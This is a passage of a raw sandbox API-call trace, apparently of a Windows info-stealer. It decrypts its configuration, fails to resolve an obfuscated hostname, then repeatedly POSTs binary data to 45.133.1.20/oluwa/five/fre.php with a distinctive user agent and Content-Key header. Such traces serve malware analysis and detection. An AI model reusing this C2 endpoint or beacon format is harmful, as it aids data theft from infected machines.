ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0225.519] GetProcessHeap () returned 0x6a0000 [0225.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0225.519] socket (af=2, type=1, protocol=6) returned 0x6ac [0225.520] connect (s=0x6ac, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0225.542] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0225.542] GetProcessHeap () returned 0x6a0000 [0225.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0225.542] GetProcessHeap () returned 0x6a0000 [0225.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0225.543] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.544] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.544] GetProcessHeap () returned 0x6a0000 [0225.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0225.544] GetProcessHeap () returned 0x6a0000 [0225.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.545] GetProcessHeap () returned 0x6a0000 [0225.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0225.545] GetProcessHeap () returned 0x6a0000 [0225.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0225.546] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.547] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.547] GetProcessHeap () returned 0x6a0000 [0225.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0225.547] GetProcessHeap () returned 0x6a0000 [0225.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.548] send (s=0x6ac, buf=0x6b5c98*, len=242, flags=0) returned 242 [0225.548] send (s=0x6ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0225.548] GetProcessHeap () returned 0x6a0000 [0225.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0225.549] recv (in: s=0x6ac, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0225.614] GetProcessHeap () returned 0x6a0000 [0225.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0225.616] GetProcessHeap () returned 0x6a0000 [0225.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0225.618] GetProcessHeap () returned 0x6a0000 [0225.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0225.618] GetProcessHeap () returned 0x6a0000 [0225.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0225.618] closesocket (s=0x6ac) returned 0 [0225.619] GetProcessHeap () returned 0x6a0000 [0225.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0225.619] GetProcessHeap () returned 0x6a0000 [0225.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.619] GetProcessHeap () returned 0x6a0000 [0225.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0225.620] GetProcessHeap () returned 0x6a0000 [0225.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0225.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x136c) returned 0x6ac [0225.622] Sleep (dwMilliseconds=0xea60) [0225.624] GetProcessHeap () returned 0x6a0000 [0225.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0225.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0225.643] GetProcessHeap () returned 0x6a0000 [0225.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0225.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.644] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.646] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.647] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.647] GetProcessHeap () returned 0x6a0000 [0225.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0225.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.649] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0225.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.650] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.651] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0225.651] GetProcessHeap () returned 0x6a0000 [0225.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.654] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.655] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.661] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.662] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.662] GetProcessHeap () returned 0x6a0000 [0225.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0225.662] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.665] GetProcessHeap () returned 0x6a0000 [0225.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0225.665] GetProcessHeap () returned 0x6a0000 [0225.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.666] GetProcessHeap () returned 0x6a0000 [0225.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0225.666] GetProcessHeap () returned 0x6a0000 [0225.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0225.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.667] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0225.692] GetProcessHeap () returned 0x6a0000 [0225.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0225.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.693] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.694] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.695] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.695] GetProcessHeap () returned 0x6a0000 [0225.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0225.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.699] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0225.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.700] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.701] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0225.701] GetProcessHeap () returned 0x6a0000 [0225.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.702] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0225.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.704] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0225.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.706] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0225.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.709] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0225.709] GetProcessHeap () returned 0x6a0000 [0225.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0225.709] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0225.709] GetProcessHeap () returned 0x6a0000 [0225.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0225.709] socket (af=2, type=1, protocol=6) returned 0x6b0 [0225.709] connect (s=0x6b0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0225.742] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0225.742] GetProcessHeap () returned 0x6a0000 [0225.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0225.742] GetProcessHeap () returned 0x6a0000 [0225.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0225.743] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.744] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.744] GetProcessHeap () returned 0x6a0000 [0225.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0225.744] GetProcessHeap () returned 0x6a0000 [0225.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.745] GetProcessHeap () returned 0x6a0000 [0225.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0225.745] GetProcessHeap () returned 0x6a0000 [0225.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0225.746] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.746] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.746] GetProcessHeap () returned 0x6a0000 [0225.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0225.747] GetProcessHeap () returned 0x6a0000 [0225.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.747] send (s=0x6b0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0225.747] send (s=0x6b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0225.748] GetProcessHeap () returned 0x6a0000 [0225.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0225.748] recv (in: s=0x6b0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0225.814] GetProcessHeap () returned 0x6a0000 [0225.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0225.815] GetProcessHeap () returned 0x6a0000 [0225.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0225.818] GetProcessHeap () returned 0x6a0000 [0225.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0225.819] GetProcessHeap () returned 0x6a0000 [0225.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0225.819] closesocket (s=0x6b0) returned 0 [0225.820] GetProcessHeap () returned 0x6a0000 [0225.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0225.820] GetProcessHeap () returned 0x6a0000 [0225.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.820] GetProcessHeap () returned 0x6a0000 [0225.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0225.820] GetProcessHeap () returned 0x6a0000 [0225.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0225.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13b8) returned 0x6b0 [0225.824] Sleep (dwMilliseconds=0xea60) [0225.826] GetProcessHeap () returned 0x6a0000 [0225.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0225.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.830] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0225.866] GetProcessHeap () returned 0x6a0000 [0225.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0225.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.867] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.869] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.870] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.870] GetProcessHeap () returned 0x6a0000 [0225.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0225.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.887] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0225.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.894] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.896] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0225.896] GetProcessHeap () returned 0x6a0000 [0225.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.897] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.899] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.900] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.901] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.901] GetProcessHeap () returned 0x6a0000 [0225.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0225.902] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.902] GetProcessHeap () returned 0x6a0000 [0225.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0225.903] GetProcessHeap () returned 0x6a0000 [0225.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.906] GetProcessHeap () returned 0x6a0000 [0225.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0225.906] GetProcessHeap () returned 0x6a0000 [0225.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0225.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.919] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0225.928] GetProcessHeap () returned 0x6a0000 [0225.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0225.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.930] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.973] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.974] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.974] GetProcessHeap () returned 0x6a0000 [0225.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0225.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.975] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0225.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.978] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.979] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0225.979] GetProcessHeap () returned 0x6a0000 [0225.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.983] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0225.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.984] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0225.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.985] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0225.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.987] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0225.987] GetProcessHeap () returned 0x6a0000 [0225.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0225.987] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0225.987] GetProcessHeap () returned 0x6a0000 [0225.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0225.987] socket (af=2, type=1, protocol=6) returned 0x6b4 [0225.987] connect (s=0x6b4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0226.017] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0226.017] GetProcessHeap 